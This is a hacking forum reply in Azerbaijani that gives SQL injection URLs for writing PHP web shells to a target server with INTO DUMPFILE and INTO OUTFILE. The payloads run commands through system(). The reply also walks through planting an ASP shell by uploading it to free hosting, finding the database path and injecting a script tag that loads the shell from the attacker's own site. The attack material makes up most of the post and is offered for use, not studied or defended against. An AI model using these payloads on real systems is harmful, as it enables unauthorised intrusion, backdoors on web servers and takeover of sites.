Avatar Fearless re:answered

1. O Heç Bro SQL İlə upload mümkündür :
2. [code]http://www.site.com/index.php?id=-725+UNION+SELECT+null,’CODE’,null,null,null+INTO+DUMPFILE+’/path/on/target/evil.php’—[/code]
3. Və ya dediyin kimi İnto Dump Fİle :
4. [code] http://www.site.com/index.php?id=-725+UNION+SELECT+null,'<? system($_GET['c']); ?>’,null,null,null+INTO+DUMPFILE+’/path/on/target/evil.php’—[/code]
5. Yada OutFile :
6. [code]http://www.site.com/index.php?id=-725+UNION+SELECT+"<? system($_REQUEST['cmd']); ?>",2,3,4 INTO+OUTFILE+“/var/www/html/temp/evil.php"[/code]
7. Onları Bilirəm. XSS ilədə mümkündü Shell Upload eləmək. Anlatım :
8. Deməli SourceForce-dən Shell-i indiririik. pulsuz hosting alırıq .asp dəstəkli. DB-nin yolun bilməliyik. GetDB.asp yaradırıq içinə
9. [code]<%
10.  
11. Response.Write Server.MapPath(".")
12.  
13. %>
14. [/code]
15. Upload eləyirik bütün faylları. Sonra GetDB.asp -ni brovser-də açırıq. Database-nin yolun göstərəcək. SOnra shell.asp-mizi acırıq notepad++ ilə. VƏ var = SERVER yerinə serverimizin URL-in yapışdırırıq. sonra admin/db.asp açırıq DBPATH-da yolunu dəyişdirib GetDB.asp-dəki yolu qoyuruq və shell.mdb-yə yönəldirik :
16. [code]DBPATH = "D:\usersss\username\db\shell.mdb" [/code]
17. Sonrada LFİ kimi include edirik
18. [code]<script src=http://səninsiten.tld/shell.asp></script> [/code]
19. Beləliklə 1 növ include olur. Gördüyün kimi bu o qədərdə çətin deyil. Yani hər cür shell salmaq olur. Bunun üçün bunu öyrənmək üçün Ansiklopedi boyda anatomi oxudum :D:D:D Deməli Sualım bu deyildi sualım XSS-də tapdığımız MD5 ilə SQL-də çəkdiyimiz MD5 eyni olur ? Sən dedinki olmur sıhv eləmirəmsə mənədə bu lazım idi. Yani Crypt olmur Bununa Bildim Thank`Z